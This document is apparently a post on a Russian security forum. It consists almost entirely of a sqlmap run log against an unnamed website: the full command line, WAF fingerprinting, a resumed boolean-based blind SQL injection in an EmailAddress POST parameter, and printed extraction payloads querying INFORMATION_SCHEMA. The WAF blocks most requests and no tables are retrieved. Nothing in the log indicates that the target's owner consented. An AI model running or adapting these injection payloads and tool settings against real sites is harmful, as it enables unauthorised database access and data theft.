ANTICHAT — форум по информационной безопасности, OSINT и технологиям

sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --
tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.4.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:56:40

[01:56:40] [INFO] parsing HTTP request from '1.txt'
[01:56:40] [DEBUG] not a valid WebScarab log data
[01:56:40] [DEBUG] cleaning up configuration parameters
[01:56:40] [DEBUG] loading WAF script '360'
[01:56:40] [DEBUG] loading WAF script 'airlock'
[01:56:40] [DEBUG] loading WAF script 'anquanbao'
[01:56:40] [DEBUG] loading WAF script 'armor'
[01:56:40] [DEBUG] loading WAF script 'asm'
[01:56:40] [DEBUG] loading WAF script 'aws'
[01:56:40] [DEBUG] loading WAF script 'baidu'
[01:56:40] [DEBUG] loading WAF script 'barracuda'
[01:56:40] [DEBUG] loading WAF script 'bigip'
[01:56:40] [DEBUG] loading WAF script 'binarysec'
[01:56:40] [DEBUG] loading WAF script 'blockdos'
[01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
[01:56:40] [DEBUG] loading WAF script 'cloudflare'
[01:56:40] [DEBUG] loading WAF script 'cloudfront'
[01:56:40] [DEBUG] loading WAF script 'comodo'
[01:56:40] [DEBUG] loading WAF script 'datapower'
[01:56:40] [DEBUG] loading WAF script 'denyall'
[01:56:40] [DEBUG] loading WAF script 'dosarrest'
[01:56:40] [DEBUG] loading WAF script 'dotdefender'
[01:56:40] [DEBUG] loading WAF script 'edgecast'
[01:56:40] [DEBUG] loading WAF script 'expressionengine'
[01:56:40] [DEBUG] loading WAF script 'fortiweb'
[01:56:40] [DEBUG] loading WAF script 'generic'
[01:56:40] [DEBUG] loading WAF script 'hyperguard'
[01:56:40] [DEBUG] loading WAF script 'incapsula'
[01:56:40] [DEBUG] loading WAF script 'isaserver'
[01:56:40] [DEBUG] loading WAF script 'jiasule'
[01:56:40] [DEBUG] loading WAF script 'knownsec'
[01:56:40] [DEBUG] loading WAF script 'kona'
[01:56:40] [DEBUG] loading WAF script 'modsecurity'
[01:56:40] [DEBUG] loading WAF script 'naxsi'
[01:56:40] [DEBUG] loading WAF script 'netcontinuum'
[01:56:40] [DEBUG] loading WAF script 'netscaler'
[01:56:40] [DEBUG] loading WAF script 'newdefend'
[01:56:40] [DEBUG] loading WAF script 'nsfocus'
[01:56:40] [DEBUG] loading WAF script 'paloalto'
[01:56:40] [DEBUG] loading WAF script 'profense'
[01:56:40] [DEBUG] loading WAF script 'proventia'
[01:56:40] [DEBUG] loading WAF script 'radware'
[01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
[01:56:40] [DEBUG] loading WAF script 'safe3'
[01:56:40] [DEBUG] loading WAF script 'safedog'
[01:56:40] [DEBUG] loading WAF script 'secureiis'
[01:56:40] [DEBUG] loading WAF script 'senginx'
[01:56:40] [DEBUG] loading WAF script 'sitelock'
[01:56:40] [DEBUG] loading WAF script 'sonicwall'
[01:56:40] [DEBUG] loading WAF script 'sophos'
[01:56:40] [DEBUG] loading WAF script 'stingray'
[01:56:40] [DEBUG] loading WAF script 'sucuri'
[01:56:40] [DEBUG] loading WAF script 'tencent'
[01:56:40] [DEBUG] loading WAF script 'teros'
[01:56:40] [DEBUG] loading WAF script 'trafficshield'
[01:56:40] [DEBUG] loading WAF script 'urlscan'
[01:56:40] [DEBUG] loading WAF script 'uspses'
[01:56:40] [DEBUG] loading WAF script 'varnish'
[01:56:40] [DEBUG] loading WAF script 'wallarm'
[01:56:40] [DEBUG] loading WAF script 'watchguard'
[01:56:40] [DEBUG] loading WAF script 'webappsecure'
[01:56:40] [DEBUG] loading WAF script 'webknight'
[01:56:40] [DEBUG] loading WAF script 'wordfence'
[01:56:40] [DEBUG] loading WAF script 'yundun'
[01:56:40] [DEBUG] loading WAF script 'yunsuo'
[01:56:40] [DEBUG] loading WAF script 'zenedge'
[01:56:40] [DEBUG] setting the HTTP timeout
[01:56:40] [DEBUG] creating HTTP requests opener object
[01:56:40] [DEBUG] forcing back-end DBMS to user defined value
custom injection marker ('*') found in option '--data'. Do you want to process i
t? [Y/n/q] y
[01:56:41] [DEBUG] resolving hostname 'url'
[01:56:41] [INFO] testing connection to the target URL
[01:56:41] [DEBUG] declared web page charset 'utf-8'
[01:56:41] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
[01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewal
l (360)'
[01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
[01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application F
irewall (Anquanbao)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Def
ense)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manage
r (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web App
lication Firewall (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Fi
rewall (Baidu)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application F
irewall (Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security
 Manager (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application F
irewall (BinarySEC)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisc
o Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application
Firewall (CloudFlare)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Fire
wall (Comodo)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IB
M)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Fi
rewall (DenyAll)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Intern
et Security)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Tech
nologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)
'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Fi
rewall (Fortinet)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application
Firewall (art of defence)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application F
irewall (Incapsula/Imperva)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Fir
ewall (Jiasule)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Ak
amai Technologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source We
b Application Firewall (Trustwave)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Applicatio
n Firewall (NetContinuum/Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'

[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application F
irewall (Newdefend)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Fir
ewall (NSFOCUS)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Al
to Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Fi
rewall (Armorlogic)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application S
ecurity (IBM)'
[01:56:42] [DEBUG] page not found (404)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMo
de (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firew
all'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Fir
ewall (Safedog)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Securi
ty (BeyondTrust)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporatio
n)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application
Firewall (SiteLock)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)
'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewa
ll (Riverbed / Brocade)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall
 (Sucuri)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Applicati
on Firewall (Tencent Cloud Computing)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Fi
rewall Enterprise (Teros/Citrix Systems)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)
'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (Un
ited Security Providers)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Fir
ewall (Wallarm)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Tech
nologies)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'

[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firew
all (AQTRONIX)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Fire
wall (Yundun)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Fire
wall (Yunsuo)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Fir
ewall (Zenedge)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
[01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
[01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\art
em\appdata\local\temp\sqlmapuumtkb12408\sqlmapresponse-opc2v1'. If you know the
details on used protection please report it along with specific response to 'dev
@sqlmap.org'
are you sure that you want to continue with further target testing? [y/N] y
[01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
    Vector: AND [INFERENCE]
---
[01:56:44] [INFO] testing MySQL
[01:56:44] [DEBUG] resuming configuration option 'code' (200)
[01:56:44] [INFO] confirming MySQL
[01:56:44] [INFO] the back-end DBMS is MySQL
[01:56:44] [INFO] fetching banner
[01:56:44] [INFO] resumed: 5.6.39-cll-lve
[01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: Apache, PHP 7.1.14
back-end DBMS: MySQL >= 5.0.0
banner:    '5.6.39-cll-lve'
[01:56:44] [INFO] fetching tables for database: 'database'
[01:56:44] [INFO] fetching number of tables for database 'database'
[01:56:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>51
 AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
ation step in similar cases
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>48
 AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>9
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [INFO] retrieved:
[01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
[01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
[01:56:44] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[01:56:46] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
[01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
 kind of protection is involved (e.g. WAF)
[01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlma
p\output\url'